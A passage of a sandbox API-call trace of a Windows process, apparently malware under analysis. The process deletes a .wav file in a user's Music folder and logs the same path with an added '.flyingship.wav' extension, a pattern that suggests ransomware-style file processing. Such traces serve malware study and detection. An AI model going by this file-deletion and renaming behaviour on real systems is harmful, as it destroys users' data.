0 [0186.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.679] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.679] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.679] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.679] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.680] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", lpFilePart=0x0) returned 0x6b [0186.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd34cb0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x4145b680, ftLastAccessTime.dwHighDateTime=0x1d5de2d, ftLastWriteTime.dwLowDateTime=0x147fbaa0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7b69, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="y3qZNbvqKQ2uR4UOsf8q.wav", cAlternateFileName="Y3QZNB~1.WAV")) returned 0x90af58 [0186.680] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\y3qznbvqkq2ur4uosf8q.wav")) returned 1 [0186.683] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd34cb0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x4145b680, ftLastAccessTime.dwHighDateTime=0x1d5de2d, ftLastWriteTime.dwLowDateTime=0x147fbaa0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7b69, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="y3qZNbvqKQ2uR4UOsf8q.wav", cAlternateFileName="Y3QZNB~1.WAV")) returned 0 [0186.683] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0186.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.684] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0186.685] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.685] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.685] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0186.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.685] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.686] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.686] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.686] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.688] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.688] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0186.688] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.688] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0186.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.689] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0186.689] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x255e, lpOverlapped=0x0) returned 1 [0186.690] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0186.690] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x255e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.690] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0186.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.flyingship.wav\r\n", cchWideChar=121, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 121 [0186.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x79) returned 0x9c0c88 [0186.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.flyingship.wav\r\n", cchWideChar=121, lpMultiByteStr=0x9c0c88, cbMultiByte=121, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 121 [0186.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0186.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0186.690] WriteFile (in: hFile=0x120, lpBuffer=0x9c0c00*, nNumberOfBytesToWrite=0x78, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c0c00*, lpNumberOfBytesWritten=0x87f43c*=0x78, lpOverlapped=0x0) returned 1 [0186.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0186.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.691] CloseHandle (hObject=0x120) returned 1 [0186.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0186.697] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0186.697] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0186.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.699] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0186.699] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.699] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.699] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0186.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0186.700] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0186.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0186.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) 